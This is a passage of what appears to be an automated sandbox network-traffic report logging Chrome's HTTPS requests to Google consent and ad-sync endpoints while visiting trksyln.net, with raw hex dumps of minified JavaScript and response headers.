                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:33 UTC1936INData Raw: 21 3d 2d 31 7d 3b 45 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 61 3f 21 21 5f 2e 42 61 26 26 5f 2e 42 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 61 28 29 3f 43 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 44 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 44 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 45 61 28 29 3f 30 3a 5f 2e 44 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 44 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 48 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76
                                                                                                                                                                                                                                                                                                                      Data Ascii: !=-1};Ea=function(){return _.Aa?!!_.Ba&&_.Ba.brands.length>0:!1};Ga=function(){return Ea()?Ca("Chromium"):(_.Da("Chrome")||_.Da("CriOS"))&&!(Ea()?0:_.Da("Edge"))||_.Da("Silk")};_.Ia=function(a){return Ha&&a!=null&&a instanceof Uint8Array};La=function(){v
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:33 UTC1936INData Raw: 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 77 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 75 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 76 62 28 5b 5d 2c 7b 7d 29 3b 75 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 75 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65
                                                                                                                                                                                                                                                                                                                      Data Ascii: sb=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};wb=function(a){if(ub===void 0){var b=new vb([],{});ub=Array.prototype.concat.call([],b).length===1}ub&&typeof Symbol==="function"&&Symbol.isConcatSpreadable


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      32192.168.2.449838142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:33 UTC845OUTPOST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 155
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:33 UTC155OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 32 33 34 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 33 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                      Data Ascii: [null,null,null,null,null,null,null,null,1730398772342,null,null,[[3,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1861INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-AFmTRh1yQiqhmXdzvJ0aWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmLw0ZBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYNqV_J5vAg3WbBZRckvIL45Pz80pS80p0E1OKdUHsosyk0pL8IhR2ahlIRU5-enpmXnq8kYGRiaGBsYGegXF8gQEA7zwoEg"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      33192.168.2.44985634.160.236.644437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:33 UTC783OUTGET /t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: odr.mookie1.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                      Content-Length: 42
                                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 19 Oct 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "6530c7b4-2a"
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      34192.168.2.449839172.217.18.44437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC798OUTGET /pagead/drt/ui HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                      Referer: https://googleads.g.doubleclick.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC426INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Location: https://googleads.g.doubleclick.net/pagead/drt/si?st=NO_DATA
                                                                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Server: cafe
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      35192.168.2.4498708.2.111.1364437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC774OUTGET /sync?id=10&google_gid=CAESELZvmPR7DxJls1q5vUVneqI&google_cver=1&google_push=AXcoOmTOEF9Y8fogjEB4TqPOvFToDFSNcqrrOe7PA0KGyHSr7lsEvHJLWXoidRqi6SOq-7TG1-HqyFGdK2rWPeFjmNw3z3TgjDyQdg HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: sync2-dsp.e-volution.ai
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://pagead2.googlesyndication.com/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC410INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                      Set-Cookie: production=42792e3cde3b100032f83ab40466; HttpOnly; SameSite=None; Secure; Expires=Wed Jan 29 2025 18:19:34 GMT+0000 (Coordinated Universal Time); Max-Age=7776000; path=/; domain=.e-volution.ai;
                                                                                                                                                                                                                                                                                                                      Location: https://cm.g.doubleclick.net/pixel?google_nid=309242622&google_hm=42792e3cde3b100032f83ab40466
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      36192.168.2.449846142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC845OUTPOST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 158
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC158OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 32 35 31 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 5b 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                      Data Ascii: [null,null,null,null,null,null,null,null,1730398772512,null,null,[null,[1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1861INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-pbmt4W0PWKCiR3fq0jdSaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmII0JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYNqV_J5vAgq8rSpRckvIL45Pz80pS80p0E1OKdUHsosyk0pL8IhR2ahlIRU5-enpmXnq8kYGRiaGBsYGegXF8gQEAC2oodg"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      37192.168.2.449845142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC845OUTPOST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      Content-Length: 155
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC155OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 32 35 33 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 32 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d
                                                                                                                                                                                                                                                                                                                      Data Ascii: [null,null,null,null,null,null,null,null,1730398772531,null,null,[[2,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:34 UTC1861INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://trksyln.net
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:34 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-q4eeqtZLwA88oN-SM0A74w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
